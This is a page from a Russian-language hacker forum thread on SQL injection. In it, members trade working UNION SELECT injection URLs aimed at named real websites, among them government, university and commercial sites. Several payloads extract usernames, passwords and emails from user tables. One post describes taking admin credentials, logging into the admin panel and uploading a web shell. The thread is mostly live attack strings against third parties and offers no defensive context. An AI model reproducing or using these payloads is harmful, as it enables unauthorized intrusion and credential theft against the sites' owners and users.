SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    2 ice1k
    самому слабо додумать дальше? =D
     
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 2 символов.
    хек?
     
    2 people like this.
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    а мне пох http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,concat(memberName,char(58),passwd),4,5+from+u19508.smf_members/*
     
    2 people like this.
  4. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Вот и правильно, я этого и ждал, чтобы кто-нить запостил нормальный вариант... - я думал этого никогда не случится :p
     
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,table_name+from+information_schema.tables+limit+1,1/*
    Code:
    http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,column_name+from+information_schema.columns+limit+1,1/*
    пару таблиц и колонок нашел, но прав не хватает похоже.
     
  6. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.gramota.ru/news.html?nn=-2043+union+select+1,2,user(),4,5,6/*
    _-[A.M.D]HiM@S-_, а хотя не, продолжай курить ту же :D

    Code:
    http://ru-hosting.ru/article.php?sid=2222222289+union+select+1,2,user(),4,5,6/*
    хз было или нет
     
    #706 n0ne, 6 Mar 2007
    Last edited: 6 Mar 2007
  7. Nekt

    Nekt Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    58
    Likes Received:
    11
    Reputations:
    0
    первые мои скули
    Code:
    http://www.tmx.kiev.ua/a-news/news.php?id=-2+union+select+1,2,3,version(),user(),6,7,8/*
    Code:
    http://www.kpla.kz/news.php?id=-2+union+select+1,2,3,4,user(),6/
    Code:
    http://ru-host.ru/next.php?id=3'
    нечего так и не подобрал :(
     
    #707 Nekt, 6 Mar 2007
    Last edited: 6 Mar 2007
    2 people like this.
  8. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    omg, посмотри чуть выше.
     
  9. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    кусочек экзотики :D
    Code:
    http://top.ge/cat.php?c=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(version(),0),0),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
    правда, таблицы подобрать не смог =\ утро...
    //upd:
    к mysql.user выводит "access denied for ...."
     
    #709 n1†R0x, 6 Mar 2007
    Last edited: 6 Mar 2007
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    просто на страничку ничего не выводится
    http://ru-host.ru/next.php?id=-2+union+select+1,2/*
     
  11. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,7,8,9/*

    http://www.php.com/include/groups/showInfo.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
     
    #711 Colkru, 6 Mar 2007
    Last edited: 6 Mar 2007
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    на php.com я выкладывал уже, вроде даже этот скрипт.

    По поводу первого - немного заюзаем уязвимость :D
    Code:
    http://www.uni-kassel.de/~sesame/_Welcome.html
    тут скрипт, кажись админский :)
    пассы выдираем запросом
    Code:
    http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,password,8,9+from+users/*
    username не нужен, да и нет его в таблице имхо)

    без проблем, это вполне нормально..
    поиск не ищет, т.к. многие в [*code] пихают запросы) но оно и к лучшему)
     
    #712 n1†R0x, 6 Mar 2007
    Last edited: 6 Mar 2007
    1 person likes this.
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    я в цитаты кидаю, так ИМХО более читаемо =)
    такс...
    админовский логин и пароль, не удивляйтесь что лимит стоит =)
    админка
    Там кликаем куда нить слева (хз чё там написано) и льём шелл.
    Шелл уже залит кстати =D но ссылку не могу дать ))
     
  14. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.smartsystemsllc.com/ru/products.php?pr_id=-99+union+select+111,222/*
    
    o_O
    по-шарить так и не смог... ничерта не грузится =\ с каналом что-то =\
     
    3 people like this.
  15. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    вот еще
    http://mk.uct.ua/?q=category&id=-1+union+select+1,2,3,4,5,6,7,version()/*
     
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    __http://www.mywindow.ru/index.php?category=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*

    __http://www.dreamokna.ru/?sec=15&item=10000000000+union+select+1,2,3/*

    __http://www.akademokna.ru/pages.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
     
    2 people like this.
  17. Darg

    Darg New Member

    Joined:
    6 Mar 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.rocit.ru/news/shownews.php3?id=30100+UNION+SELECT+1,USER_ID,3,4,5,6,7,8,9,0+FROM+USER/*
    
    PR=6
    Но к сожалению без вывода
    Code:
    http://www.ladofon.ru/news_detail.php?news_id=69+UNION+SELECT+1,2,3,concat(email,char(58),password),5,6,7,8+FROM+user/*
    
    PR=4
     
    #717 Darg, 6 Mar 2007
    Last edited: 6 Mar 2007
  18. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Darg, мой тебе совет, по-крайней мере в этой теме... - если после твоего поста больше ничего не было - то просто нажимай -Edit- и добавляй новый пост в предыдущий... =\
     
  19. Nekt

    Nekt Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    58
    Likes Received:
    11
    Reputations:
    0
    Code:
    http://www.tradeinter.ru/news.php?id=2'
    Code:
    http://www.tradeinter.ru/cat.php?id=77'
     
  20. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Врёте вы всё ;)
    Code:
    http://www.tradeinter.ru/cat.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
     
    #720 ice1k, 6 Mar 2007
    Last edited: 6 Mar 2007
Thread Status:
Not open for further replies.